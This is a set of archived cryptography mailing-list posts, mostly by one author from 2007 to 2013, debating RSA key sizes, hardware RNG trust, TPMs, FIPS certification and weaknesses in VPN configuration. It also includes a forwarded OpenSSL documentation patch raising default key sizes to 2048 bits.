Re: [Cryptography] Radioactive random numbers

2013-09-13 Thread Thor Lancelot Simon
On Thu, Sep 12, 2013 at 11:00:47AM -0400, Perry E. Metzger wrote:
 
 In addition to getting CPU makers to always include such things,
 however, a second vital problem is how to gain trust that such RNGs
 are good -- both that a particular unit isn't subject to a hardware
 defect and that the design wasn't sabotaged. That's harder to do.

Or that a design wasn't sabotaged intentionally wasn't sabotaged
accidentally while dropping it into place in a slightly different
product.  I've always thought highly of the design of the Hifn RNG
block, and the outside analysis of it which they published, but years
ago at Reefedge we found a bug in its integration into a popular Hifn
crypto processor that evidently had slipped through the cracks -- I
discussed it in more detail last year at
http://permalink.gmane.org/gmane.comp.security.cryptography.randombit/3020 .

Thor
___
The cryptography mailing list
cryptography@metzdowd.com
http://www.metzdowd.com/mailman/listinfo/cryptography


Re: [Cryptography] Washington Post: Google racing to encrypt links between data centers

2013-09-07 Thread Thor Lancelot Simon
On Fri, Sep 06, 2013 at 07:53:42PM -0400, Marcus D. Leech wrote:

 One wonders why they weren't already using link encryption systems?

One wonders whether, if what we read around here lately is much guide,
they still believe they can get link encryption systems that are
robust against the only adversary likely to be attacking their North
American links?

Thor
___
The cryptography mailing list
cryptography@metzdowd.com
http://www.metzdowd.com/mailman/listinfo/cryptography


Re: Formal notice given of rearrangement of deck chairs on RMS PKItanic

2010-10-06 Thread Thor Lancelot Simon
On Wed, Oct 06, 2010 at 01:32:00PM -0500, Matt Crawford wrote:

 That is, if your CA key size is smaller, stop signing with it.

You may have missed the next sentence of Mozilla's statement:

 All CAs should stop issuing intermediate and end-entity certificates with
 RSA key size smaller than 2048 bits under any root.

That is, no matter how long your root key is (the previous sentence
stated the requirements about _that_) you may not use it to sign any
end-entity certificate whose key size is  2048 bits.

Gun: check.
Bullets: check.
Feet: check.

Now they have everything they need to prevent HTTPS Everywhere.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to majord...@metzdowd.com


Re: 2048 bits, damn the electrons! [...@openssl.org: [openssl.org #2354] [PATCH] Increase Default RSA Key Size to 2048-bits]

2010-09-30 Thread Thor Lancelot Simon
On Wed, Sep 29, 2010 at 09:22:38PM -0700, Chris Palmer wrote:
 Thor Lancelot Simon writes:
 
  a significant net loss of security, since the huge increase in computation
  required will delay or prevent the deployment of SSL everywhere.
 
 That would only happen if we (as security experts) allowed web developers to
 believe that the speed of RSA is the limiting factor for web application
 performance.

At 1024 bits, it is not.  But you are looking at a factor of *9* increase
in computational cost when you go immediately to 2048 bits.  At that point,
the bottleneck for many applications shifts, particularly those which are
served by offload engines specifically to move the bottleneck so it's not
RSA in the first place.

Also, consider devices such as deep-inspection firewalls or application
traffic managers which must by their nature offload SSL processing in
order to inspect and possibly modify data before application servers see 
it.  The inspection or modification function often does not parallelize
nearly as well as the web application logic itself, and so it is often
not practical to handle it in a distributed way and just add more CPU.

At present, these devices use the highest performance modular-math ASICs
available and can just about keep up with current web applications'
transaction rates.  Make the modular math an order of magnitude slower
and suddenly you will find you can't put these devices in front of some
applications at all.

This too will hinder the deployment of SSL everywhere, and handwaving
about how for some particular application, the bottleneck won't be at
the front-end server even if it is an order of magnitude slower for it
to do the RSA operation itself will not make that problem go away.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to majord...@metzdowd.com


Re: 2048 bits, damn the electrons! [...@openssl.org: [openssl.org #2354] [PATCH] Increase Default RSA Key Size to 2048-bits]

2010-09-30 Thread Thor Lancelot Simon
On Thu, Sep 30, 2010 at 01:36:47PM -0400, Paul Wouters wrote:
[I wrote]:
 Also, consider devices such as deep-inspection firewalls or application
 traffic managers which must by their nature offload SSL processing in
 order to inspect and possibly modify data

 You mean it will be harder for MITM attacks on SSL. Isn't that a good thing? 
 :P

No, I don't mean that, because if the administrator of site _X_ decides
to do SSL processing on a front-end device instead of on the HTTP servers,
for whatever reason, that is simply not a MITM attack.

To characterize it as one is basically obfuscatory.

When I talk about SSL everywhere being an immediate opportunity, I mean
that, from my point of view, it looks like there's a growing realization
that _for current key sizes and server workloads_, for many high transaction
rate sites like Gmail, using SSL is basically free -- so you might as well,
and we all end up better off.

Mutliplying the cost of the SSL session negotiation by a small factor will
change that for a few sites, but multiplying it by a factor somewhere from
8 to 11 (depending on different measurements posted here in previous
discussions) will change it for a lot more.

That's very unfortunate, from my point of view, because I believe it is
a much greater net good to have most or almost all HTTP traffic encrypted
than it is for individual websites to have keys that expire in 3 years,
but are resistant to factoring for 20 years.

The balance is just plain different for end keys and CA keys.  A
one-size-fits-all approach using the key length appropriate for the CA
will hinder universal deployment of SSL/TLS at the end sites.  That is
not a good thing.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to majord...@metzdowd.com


2048 bits, damn the electrons! [...@openssl.org: [openssl.org #2354] [PATCH] Increase Default RSA Key Size to 2048-bits]

2010-09-29 Thread Thor Lancelot Simon
/openssl/cvs/openssl/doc/apps/req.pod,v
retrieving revision 1.21
diff -U 5 -r1.21 req.pod
--- doc/apps/req.pod15 Apr 2009 15:26:56 -  1.21
+++ doc/apps/req.pod28 Sep 2010 14:44:44 -
@@ -347,11 +347,11 @@
 configuration file values.
 
 =item Bdefault_bits
 
 This specifies the default key size in bits. If not specified then
-512 is used. It is used if the B-new option is used. It can be
+2048 is used. It is used if the B-new option is used. It can be
 overridden by using the B-newkey option.
 
 =item Bdefault_keyfile
 
 This is the default filename to write a private key to. If not
@@ -504,20 +504,20 @@
 
  openssl req -in req.pem -text -verify -noout
 
 Create a private key and then generate a certificate request from it:
 
- openssl genrsa -out key.pem 1024
+ openssl genrsa -out key.pem 2048
  openssl req -new -key key.pem -out req.pem
 
 The same but just using req:
 
- openssl req -newkey rsa:1024 -keyout key.pem -out req.pem
+ openssl req -newkey rsa:2048 -keyout key.pem -out req.pem
 
 Generate a self signed root certificate:
 
- openssl req -x509 -newkey rsa:1024 -keyout key.pem -out req.pem
+ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out req.pem
 
 Example of a file pointed to by the Boid_file option:
 
  1.2.3.4   shortName   A longer Name
  1.2.3.6   otherName   Other longer Name
@@ -529,11 +529,11 @@
  testoid2=${testoid1}.6
 
 Sample configuration file prompting for field values:
 
  [ req ]
- default_bits  = 1024
+ default_bits  = 2048
  default_keyfile   = privkey.pem
  distinguished_name= req_distinguished_name
  attributes= req_attributes
  x509_extensions   = v3_ca
 
@@ -570,11 +570,11 @@
 
 
  RANDFILE  = $ENV::HOME/.rnd
 
  [ req ]
- default_bits  = 1024
+ default_bits  = 2048
  default_keyfile   = keyfile.pem
  distinguished_name= req_distinguished_name
  attributes= req_attributes
  prompt= no
  output_password   = mypass
Index: doc/crypto/EVP_PKEY_CTX_ctrl.pod
===
RCS file: /v/openssl/cvs/openssl/doc/crypto/EVP_PKEY_CTX_ctrl.pod,v
retrieving revision 1.3
diff -U 5 -r1.3 EVP_PKEY_CTX_ctrl.pod
--- doc/crypto/EVP_PKEY_CTX_ctrl.pod30 Sep 2009 23:42:56 -  1.3
+++ doc/crypto/EVP_PKEY_CTX_ctrl.pod28 Sep 2010 14:44:44 -
@@ -80,12 +80,12 @@
 signing -2 sets the salt length to the maximum permissible value. When
 verifying -2 causes the salt length to be automatically determined based on the
 BPSS block structure. If this macro is not called a salt length value of -2
 is used by default.
 
-The EVP_PKEY_CTX_set_rsa_rsa_keygen_bits() macro sets the RSA key length for
-RSA key genration to Bbits. If not specified 1024 bits is used.
+The EVP_PKEY_CTX_set_rsa_keygen_bits() macro sets the RSA key length for RSA 
key
+generation to Bbits. If not specified 2048 bits is used.
 
 The EVP_PKEY_CTX_set_rsa_keygen_pubexp() macro sets the public exponent value
 for RSA key generation to Bpubexp currently it should be an odd integer. The
 Bpubexp pointer is used internally by this function so it should not be 
 modified or free after the call. If this macro is not called then 65537 is 
used.
Index: doc/crypto/RSA_generate_key.pod
===
RCS file: /v/openssl/cvs/openssl/doc/crypto/RSA_generate_key.pod,v
retrieving revision 1.6
diff -U 5 -r1.6 RSA_generate_key.pod
--- doc/crypto/RSA_generate_key.pod 25 Sep 2002 13:33:27 -  1.6
+++ doc/crypto/RSA_generate_key.pod 28 Sep 2010 14:44:44 -
@@ -16,11 +16,11 @@
 RSA_generate_key() generates a key pair and returns it in a newly
 allocated BRSA structure. The pseudo-random number generator must
 be seeded prior to calling RSA_generate_key().
 
 The modulus size will be Bnum bits, and the public exponent will be
-Be. Key sizes with Bnum Elt 1024 should be considered insecure.
+Be. Key sizes with Bnum Elt 2048 should be considered insecure.
 The exponent is an odd number, typically 3, 17 or 65537.
 
 A callback function may be used to provide feedback about the
 progress of the key generation. If Bcallback is not BNULL, it
 will be called as follows:

=_1285790055-45870-1--
__
OpenSSL Project http://www.openssl.org
Development Mailing List   openssl-...@openssl.org
Automated List Manager   majord...@openssl.org

- End forwarded message -

-- 
Thor Lancelot Simont...@rek.tjls.com
  All of my opinions are consistent, but I cannot present them all
   at once.-Jean-Jacques Rousseau, On The Social Contract

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography

Re: Folly of looking at CA cert lifetimes

2010-09-14 Thread Thor Lancelot Simon
On Tue, Sep 14, 2010 at 08:14:59AM -0700, Paul Hoffman wrote:
 At 10:57 AM -0400 9/14/10, Perry E. Metzger did not write, but passed on for 
 someone else:
 This suggests to me that even if NIST is correct that 2048 bit RSA
 keys are the reasonable the minimum for new deployments after 2010,
 much shorter keys are appropriate for most server certificates that
 these CAs will sign.  The CA keys have lifetimes of 10 years or more;
 the server keys a a quarter to a fifth of that.
 
 No, no, a hundred times no. (Well, about 250 times, or however many
 CAs are in the current OS trust anchor piles.) The lifetime of a CA
 key is exactly as long as the OS or browser vendor keeps that key,
 usually in cert form, in its trust anchor pile. You should not
 extrapolate *anything* from the contents of the CA cert except the key
 itself and the proclaimed name associated with it.

I don't understand.  The original text seems to be talking about *server*
certificate lifetimes, and how much shorter they are than CA cert
lifetimes.  What does that have to do with a thousand times no about
some proposition to do with CA cert lifetimes?

In other words, if CA key lifetimes are longer than indicated by their
X.509 properties, it seems to me that just makes the quoted text about
the relationship between server and CA key lifetimes even more true.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to majord...@metzdowd.com


Re: questions about RNGs and FIPS 140

2010-08-27 Thread Thor Lancelot Simon
On Fri, Aug 27, 2010 at 07:20:06PM +1200, Peter Gutmann wrote:
 
 No.  If you choose your eval lab carefully you can sneak in a TRNG somewhere
 as input to your PRNG, but you can't get a TRNG certified, and if you're
 unlucky you won't be allowed to use a TRNG at all.

I am surprised you'd have trouble with this at any lab.  Isn't there
specific guidance on this in the DTRs?  My 10-years-rusty recollection
is that, specifically, the input used to key the Approved RNG may not
contain provably less entropy than the Approved RNG's output, or words
very close to that in effect.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to majord...@metzdowd.com


Re: Has there been a change in US banking regulations recently?

2010-08-14 Thread Thor Lancelot Simon
On Fri, Aug 13, 2010 at 02:55:32PM -0500, eric.lengve...@wellsfargo.com wrote:
 
 The big drawback is that those who want to follow NIST's
 recommendations to migrate to 2048-bit keys will be returning to
 the 2005-era overhead. Dan Kaminsky provided some benchmarks in a
 different thread on this list [1] that showed 2048-bit keys performing
 at 1/9th of 1024-bit. My own internal benchmarks have been closer to
 1/7th to 1/8th. Either way, that's back in line with the above stated
 90-95% overhead. Meaning, in Dan's words 2048 ain't happening.

Indeed.  The way forward would seem to be ECC, but show me a load balancer
or even a dedicated SSL offload device which supports ECC.  I'm not even
certain the popular clients, which are usually well ahead of everything
else in terms of cryptography support, can cope with it.  The only place
it seems to be consistently used is in proprietary client/server software
for mobile devices, as has been the case for years.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to majord...@metzdowd.com


Re: A mighty fortress is our PKI, Part II

2010-08-11 Thread Thor Lancelot Simon
On Wed, Aug 04, 2010 at 10:46:44PM -0700, Jon Callas wrote:
 
 I think you'll have to agree that unlike history, which starts out as
 tragedy and replays itself as farce, PKI has always been farce over the
 centuries. It might actually end up as tragedy, but so far so good. I'm
 sure that if we look further, the Athenians had the same issues with it
 that we do today, and that Sophocles had his own farcical commentary.

If you want to see a PKI tragedy in the making, have a look at the CRLs
used by the US DoD.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to majord...@metzdowd.com


Re: Intel to also add RNG

2010-07-14 Thread Thor Lancelot Simon
On Tue, Jul 13, 2010 at 05:46:36PM +1200, Peter Gutmann wrote:
 Paul Wouters p...@xelerance.com writes:
 
 Which is what you should do anyway, in case of a hardware failure.  I
 know the Linux intel-rng and amd-rng used to produce nice series of zeros.
 
 Do you have any more details on this?  Was it a hardware problem, software
 problem, ...?  How was it caught?

I couldn't say, as regards AMD's chipset RNG.  Intel's, however, was on
an optional component of one of their motherboard chipsets.  Many
motherboard vendors chose to buy that component from other sources, who
implemented something register-compatible to the Intel part but with
the RNG register not actually connected to a random number source.

Worse, when Intel increased chipset integration and pulled the optional
chip into one of the host bridge chips, they did the exact same thing.

The basic problem was that the register indicating presence-of-RNG was
not on the same piece of silicon (originally) as the actual RNG.  So the
register really indicated only that this Intel chipset *was capable of
interfacing to the chip with the RNG on it*; nothing more.

Worse, a lot of people read noise -- but not really random noise --
from those notional RNG registers and persuaded themselves that since
the output wasn't continuous, there must really be an RNG present.
Oops.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to majord...@metzdowd.com


Re: SHA-1 and Git (was Re: [tahoe-dev] Tahoe-LAFS key management, part 2: Tahoe-LAFS is like encrypted git)

2009-08-25 Thread Thor Lancelot Simon
On Tue, Aug 25, 2009 at 12:44:57PM +0100, Ben Laurie wrote:
 Perry E. Metzger wrote:
  Yet another reason why you always should make the crypto algorithms you
  use pluggable in any system -- you *will* have to replace them some day.
 
 In order to roll out a new crypto algorithm, you have to roll out new
 software. So, why is anything needed for pluggability beyond versioning?
 
 It seems to me protocol designers get all excited about this because
 they want to design the protocol once and be done with it. But software
 authors are generally content to worry about the new algorithm when they
 need to switch to it - and since they're going to have to update their
 software anyway and get everyone to install the new version, why should
 they worry any sooner?

Look at the difference between the time it requires to add an algorithm
to OpenSSL and the time it requires to add a new SSL or TLS version to
OpenSSL.  Or should we expect TLS 1.2 support any day now?  If earlier
TLS versions had been designed to allow the hash functions in the PRF
to be swapped out, the exercise of recovering from new horrible problems
with SHA1 would be vastly simpler, easier, and far quicker.  It is just
not the case that the software development exercise of implementing a
new protocol is on a scale with that of implementing a new cipher or hash
function -- it is far, far larger, and that, alone, seems to me to be
sufficient reason to design protocols so that algorithms and algorithm
parameter sizes are not fixed.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to majord...@metzdowd.com


bcm586x has onboard key storage

2009-05-08 Thread Thor Lancelot Simon
I don't have any details of how it works (and I don't know how hard
it would be to get Broadcom to cough them up -- they seem better about
this lately than they used to be) but looking at the bcm586x product
announcement, I see they added onboard key storage.

-- 
Thor Lancelot Simont...@rek.tjls.com
Even experienced UNIX users occasionally enter rm *.* at the UNIX
 prompt only to realize too late that they have removed the wrong
 segment of the directory structure. - Microsoft WSS whitepaper

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to majord...@metzdowd.com


Re: full-disk subversion standards released

2009-04-30 Thread Thor Lancelot Simon
On Sat, Mar 07, 2009 at 05:40:31AM +1300, Peter Gutmann wrote:

 Given that, when I looked a couple of years ago, TPM support for
 public/private-key stuff was rather hit-and-miss and in some cases seemed to
 be entirely absent (so you could use the TPM to wrap and unwrap stored private
 keys

But this, itself, is valuable.  Given trivial support in the operating system
kernel, it eliminates one of the most common key-theft attack vectors
against webservers.

I must admit I'm curious whether the TPM vendors are licensing the relevant
IBM patent on what amounts to any wrapping of cryptographic keys using
encryption - I can only assume they are.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to majord...@metzdowd.com


Re: full-disk subversion standards released

2009-04-30 Thread Thor Lancelot Simon
On Sat, Mar 07, 2009 at 07:36:25AM +1300, Peter Gutmann wrote:
 
 In any case though, how big a deal is private-key theft from web servers?
 What examples of real-world attacks are there where an attacker stole a
 private key file from a web server, brute-forced the password for it, and then
 did... well, what with it?  I don't mean what you could in theory do with it,
 I mean which currently-being-exploited attack vector is this helping with?

Almost no web servers run with passwords on their private key files.
Believe me.  I build server load balancers for a living and I see a _lot_
of customer web servers -- this is how it is.

 This does seem like rather a halfway point to be in though, if you're not
 worried about private-key theft from the server then do it in software, and if
 you are then do the whole thing in hardware (there's quite a bit of this
 around for SSL offload)

No, no there's not.  In fact, I solicited information here about crypto
accellerators with onboard persistent key memory (secure key storage)
about two years ago and got basically no responses except pointers to
the same old, discontinued or obsolete products I was trying to replace.

-- 
Thor Lancelot Simont...@rek.tjls.com
Even experienced UNIX users occasionally enter rm *.* at the UNIX
 prompt only to realize too late that they have removed the wrong
 segment of the directory structure. - Microsoft WSS whitepaper

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to majord...@metzdowd.com


Re: full-disk subversion standards released

2009-04-30 Thread Thor Lancelot Simon
On Sun, Mar 15, 2009 at 12:26:39AM +1300, Peter Gutmann wrote:
 
 I was hoping someone else would leap in about now and question this, but I
 guess I'll have to do it... maybe we have a different definition of what's
 required here, but AFAIK there's an awful lot of this kind of hardware
 floating around out there, admittedly it's all built around older crypto
 devices like Broadcom 582x's and Cavium's Nitrox (because there hasn't been
 any real need to come up with replacements) but I didn't think there'd be much
 problem with finding the necessary hardware, unless you've got some particular
 requirement that rules a lot of it out.

Nitrox doesn't have onboard key memory.  Cavium's FIPS140 certified
Nitrox board-level solutions include a smartcard and a bunch of
additional hardware and software which implement (among other things)
secure key storage -- but these are a world apart from the run of the
mill Nitrox parts one finds embedded in all kinds of commonplace
devices.  They also provide an API which is tailored for FIPS140 compliance:
good if you need it, far from ideal for the common case for web servers, and
very different from the standard set of tools one gets for the bare Nitrox
platform.

There are of course similar board-level solutions using BCM582x as the
crypto core.  But in terms of cost and complexity I might as well just
use custom hardware -- I'd probably come out ahead.  And you can't just
_ignore_ performance, nor new algorithms, so eventually using very old
crypto cores makes the whole thing fail to fly.  (If moderate
performance will suffice, I note that NBMK Encryption will still sell
you the old NetOctave NSP2000, which is a pretty nice design that has
onboard key storage but lacks AES, larger SHA variants, and other modern
features).

To the extent of my knowledge there are currently _no_ generally
available, general-purpose crypto accellerator chip-level products with
onboard key storage or key wrapping support, with the exception of parts
first sold more than 5 years ago and being shipped now from old stock.

This was once a somewhat common feature on accellerators targetted at
the SSL/IPsec market.  That appears to no longer be the case.

-- 
Thor Lancelot Simont...@rek.tjls.com
Even experienced UNIX users occasionally enter rm *.* at the UNIX
 prompt only to realize too late that they have removed the wrong
 segment of the directory structure. - Microsoft WSS whitepaper

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to majord...@metzdowd.com


Re: full-disk subversion standards released

2009-01-31 Thread Thor Lancelot Simon
On Fri, Jan 30, 2009 at 04:08:07PM -0800, John Gilmore wrote:
 
 The theory that we should build good and useful tools capable of
 monopoly and totalitarianism, but use social mechanisms to prevent
 them from being used for that purpose, strikes me as naive.

Okay.  In that case, please, explain to me why you are not opposed
to the the manufacture and sale of digital computers.

More gently: it seems to me that there is an only missing from your
sentence above, or else it is almost by necessity a straw-man argument:
it will, if consistently applied as you have stated it, hold against
various tools I do not believe you actually oppose the manufacture or
sale of, such as printing presses, guns, and door locks.

Many of TCG's documents purport to specify mechanisms that are in fact
generally useful for beneficial purposes, such as boot-time validation
of software environments, secure storage of cryptographic keys, or
low-bandwidth generation of good random numbers.

Do you actually mean that such things should not be built, or only that
you are suspicious of TCG's intent in building them?

In text I've snipped, you claimed to describe TCG's charter.  I must
admit that I don't know if they even actually have such a document.
But, on the other hand, they describe their own purpose like this
(these are their actual words):

The Trusted Computing Group (TCG) is a not-for-profit organization formed to
develop, define, and promote open standards for hardware-enabled trusted
computing and security technologies, including hardware building blocks and
software interfaces, across multiple platforms, peripherals, and devices. TCG
specifications will enable more secure computing environments without
compromising functional integrity, privacy, or individual rights. The primary
goal is to help users protect their information assets (data, passwords, keys,
etc.) from compromise due to external software attack and physical theft.

I happen to think that if those _stated_ goals were achieved, that would
be a good thing, and that there are in fact hardware and software mechanisms
that could help achieve them -- some of which TCG has made stabs at
specifying, though they've generally missed the mark.

Leaving aside your assertions about TCG's _actual_ goals -- which may be
correct -- are you really of the position that what's described above,
no matter who were to build it nor how well, would be only useful for
monopoly and totalitarianism?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to majord...@metzdowd.com


Re: full-disk subversion standards released

2009-01-30 Thread Thor Lancelot Simon
On Thu, Jan 29, 2009 at 01:22:37PM -0800, John Gilmore wrote:

 If it comes from the Trusted Computing Group, you can pretty much
 assume that it will make your computer *less* trustworthy.  Their idea
 of a trusted computer is one that random unrelated third parties can
 trust to subvert the will of the computer's owner.

People have funny notions of ownership, don't they?

It's very clear to me that I don't own my desktop machine at my office;
my employer does.  But even if TCG were to punch out a useful, reasonable
standard (which I do not think they have done in any case so far), the
policy problem of how to ensure that my desktop machine's actual owner
could enforce its ownership of that machine against me, while the retailer
who sold me my desktop machine at home -- which I do own -- or for that
matter the U.S. Government, can't enforce _its_ ownership of my own
machine against me; that's a real problem, and solutions to it are useful.

Given such solutions, frameworks like what TCG is chartered to build are
in fact good and useful.  I don't think it's right to blame the tool (or
the implementation details of a particular instance of a particular kind
of tool) for the idiot carpenter.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to majord...@metzdowd.com


Re: Obama's secure PDA

2009-01-26 Thread Thor Lancelot Simon
On Mon, Jan 26, 2009 at 02:49:31AM -0500, Ivan Krsti? wrote:

 Finally, any idea why the Sect?ra is certified up to Top Secret for  
 voice but only up to Secret for e-mail? (That is, what are the differing 
 requirements?)

I know no specific details but strongly suspect the difference in
requirements, and thus certifications, stems from the likelyhood that
the device stores (even very briefly) email and cached web objects, but
does not store voice communications.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to majord...@metzdowd.com


Re: Lava lamp random number generator made useful?

2008-09-22 Thread Thor Lancelot Simon
On Sun, Sep 21, 2008 at 01:20:22PM -0400, James Cloos wrote:
  IanG == IanG  [EMAIL PROTECTED] writes:
 
 IanG Nope, sorry, didn't follow it.  What is BOM, SoC, A plug, gerber?
 
 Bill Of Materials  -- cost of the raw hardware
 System on (a) Chip -- microchip with CPU, RAM, FLASH, etc
 USB A Plug -- physical flat-four interface; think USB key drive
 gerber -- file format for hardware designs
 
 A system-on-a-chip which has rng and usb-client hardware on board (aka
 on chip) should fit in a package which looks just like a USB key drive.

I looked into this at moderate length about two years ago.  One very
attractive choice was the cheapest Motorola Coldfire with their onboard
crypto block, because you get the hashing for free and don't waste host
resources transferring in data you'll then distill by hash -- or hashing
it.

As a source of random numbers, I was figuring to use one of the publically
available thermal noise designs plus the cheapest HiFn PCI crypto chip
(which features a multi-oscillator RNG I'm reasonably familiar with) since
the Coldfire with crypto has both USB and PCI on it.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Mifare

2008-07-14 Thread Thor Lancelot Simon
On Sun, Jul 13, 2008 at 02:41:29PM +1000, James A. Donald wrote:
 
 Now everyone is going to say it should have been put out for review, and 
 of course it should have been, and had they done so they would have 
 avoided these particular mistakes, but DNSSEC and WPA was reviewed to 
 hell and back, and the result was still no damned good.

Really?  From a cryptographic -- not a political -- point of view, what
exactly is wrong with DNSSEC or WPA?

WPA certainly seems to be quite widely deployed.

-- 
Thor Lancelot Simon[EMAIL PROTECTED]
 My guess is that the minimal training typically provided would only
 have given the party in question multiple new and elaborate ways to do
 something incomprehensibly stupid and dangerous.  -Rich Goldstone

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: User interface, security, and simplicity

2008-05-04 Thread Thor Lancelot Simon
On Sat, May 03, 2008 at 07:50:01PM -0400, Perry E. Metzger wrote:
 
 Steven M. Bellovin [EMAIL PROTECTED] writes:
  There's a technical/philosophical issue lurking here.  We tried to
  solve it in IPsec; not only do I think we didn't succeed, I'm not at
  all clear we could or should have succeeded.
 
  IPsec operates at layer 3, where there are (generally) no user
  contexts.  This makes it difficult to bind IPsec credentials to a user,
  which means that it inherently can't be as simple to configure as ssh.
 
 I disagree. Fundamentally, OpenVPN isn't doing anything IPSEC couldn't
 do, and yet is is fairly easy to configure.

And yet there's no underlying technical reason why it is any easier to
configure than IPsec is; it is all a matter of the configuration interface
provided by your chosen SSL VPN (in this case, OpenVPN) or IPsec
implementation.

I find it amusing (but somewhat sad) that in fact one can find basically
the same set of flaws in each, but they're considered damning in IPsec
while they're handwaved away or overlooked in SSL VPNs.  Of course you
(Perry) or I can configure either IPsec or OpenVPN in a safe and sane way;
and, of course, there are some VPN packages of either type (IPsec or SSL
VPN) which have configuration interfaces so bad that we _couldn't_, in
fact, set them up safely -- because they prevent safe, sane configuration.

The problem is that whether you or I _can_ set software X up safely isn't
the question that matters.  The question that matters is _will_ a naive
user who does not understand the underlying security questions set software
X up securely.

And, in fact, most VPN software of any type fails this test.  My concern
is that an excessive focus on how hard is it to set this thing up? can
seriously obscure the important second half of the question and if you
set it up in the easiest possible way, is it safe?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


User interface, security, and simplicity

2008-05-01 Thread Thor Lancelot Simon
It's fashionable in some circles (including, it seems, this one) to bash
IPsec (particularly IKE) and tout SSL VPNs (particularly OpenVPN) on what
are basically user interface grounds.

I cannot help repeatedly noting that -- I believe more so than with actual
IPsec deployments, whether with or without IKE -- OpenVPN deployments are
often configured in hideously insecure ways.  This is no more the fault of
OpenVPN's designers, of course, than the ghastly configuration interfaces
imposed by many IKE impledmentations are the fault of IPsec's designers.

See, for example, http://doc.pfsense.org/index.php/VPN_Capability_OpenVPN
which is the official documentation from the popular pfsense
firewall/NAT/VPN package on configuring OpenVPN for use with clients.  Of
particular note:

1) It is not possible to configure a list of expected identities
   of users; rather, just a CA which must sign for all users.

2) No CRL is configured, nor do the instructions say to do so,
   though it is possible.

3) The client and server certificates come from the same CA,
   and both client and server get configured with *only the CA
   certificate*, not the subject name of the expected peer.

This is, of course, a serious security hole all of its
own, since it allows any client to conduct an MITM 
attack and impersonate the server.

4) Instructions are given for using a package called EasyRSA
   to set up a CA and create and sign keys.  These instructions
   have several severe flaws of their own:

a) They generate client public and private keys *on the
   CA* rather than using client generation and proper
   certificate signing requests.  This poses a needless
   risk of private key compromise, which is, in fact,
   particularly likely, since

b) The instructions mention only in passing that oh, by
   the way, one might want to encrypt the client's new
   private key, and that one _could_ do so -- but the
   example does not, in fact, encrypt the key.
   Anecdotally I have heard of a few users of this
   combination of software packages (OpenVPN/pfsense/
   EasyRSA) who bother to encrypt the private keys
   they send to users -- but quite a few more who just
   ship them around plaintext, since the example does
   so.

c) No documentation at all is given of how to revoke a
   key, nor why one would want to do so.

5) No explanation whatsoever is given of the compromises made in
   the process of simplifying the configuration of this VPN
   software -- which are significant and have major security
   consequences.

The upshot is that, indeed, at least as shown here, this particular
configuration frontend to OpenVPN is very easy to configure -- if you
are willing to settle for much less security than OpenVPN was designed
to provide, and much less than, if you're naive about cryptography, you
probably think you're getting.

Gee, that's funny, that's one of the problems with IPsec implementations
that people always cite when they tout SSL VPNs (the other is that some
firewalls can't be configured to pass IP protocol 50 for ESP -- but, of
course, ESP can be tunneled in UDP, in a standard way, and that's been
true for years now).

I am left with the strong suspicion that SSL VPNs are easier to configure
and use because a large percentage of their user population simply is not
very sensitive to how much security is actually provided.  Someone said
have a firewall, they set up a firewall.  Someone says I can't get in
through the firewall, set up a VPN, they set up a VPN.  For their purposes
IP over DNS might serve just as well -- and if enough other people said it
was secure, they'd probably get all defensive if you said it wasn't, at
least not how they'd configured it.

One could think of it, I suppose, as a combination of drinking the Kool
Aid and buying the snake oil -- drinking the snake oil?  Whatever one calls
it one should be very careful of its effects on the popular consciousness
when trying to understand what user preferences for this security product
over that one actually mean.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Gutmann Soundwave Therapy

2008-02-01 Thread Thor Lancelot Simon
On Thu, Jan 31, 2008 at 04:07:03PM +0100, Guus Sliepen wrote:
 
 Peter sent us his write-up up via private email a few days before he
 posted it to this list (which got it on Slashdot). I had little time to
 think about the issues he mentioned before his write-up became public.
 When it did, I (and others too) felt attacked in a cruel way. Peter
 ignored all the reasons *why* we used the kind of crypto we did at
 that moment, compared it to a very high standard, and made it feel like
 every thing we didn't do or didn't do as well as SSL made our crypto
 worthless. 

There is no valid reason to ship snake oil cryptography (at any moment).

There is no standard but a high standard which is appropriate for
comparison.

Since SSL was already available, there was no excuse to do anything
worse.

It seems that you still don't understand those things, or you would not
complain about them even at this far removed date.  How unfortunate.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Flaws in OpenSSL FIPS Object Module

2007-12-14 Thread Thor Lancelot Simon
On Tue, Dec 11, 2007 at 04:00:42PM -0500, Leichter, Jerry wrote:
 |  It is, of course, the height of irony that the bug was introduced in
 |  the very process, and for the very purpose, of attaining FIPS
 |  compliance!
 | 
 | But also to be expected, because the feature in question is
 | unnatural: the software needs a testable PRNG to pass the compliance
 | tests, and this means adding code to the PRNG to make it more
 | predictable under test conditions.

 Agreed.  In fact, this fits with an observation I've made in many
 contexts in the past:  Any time you introduce a new mode of operation,
 you are potentially introducing a new failure mode corresponding to
 it as well.

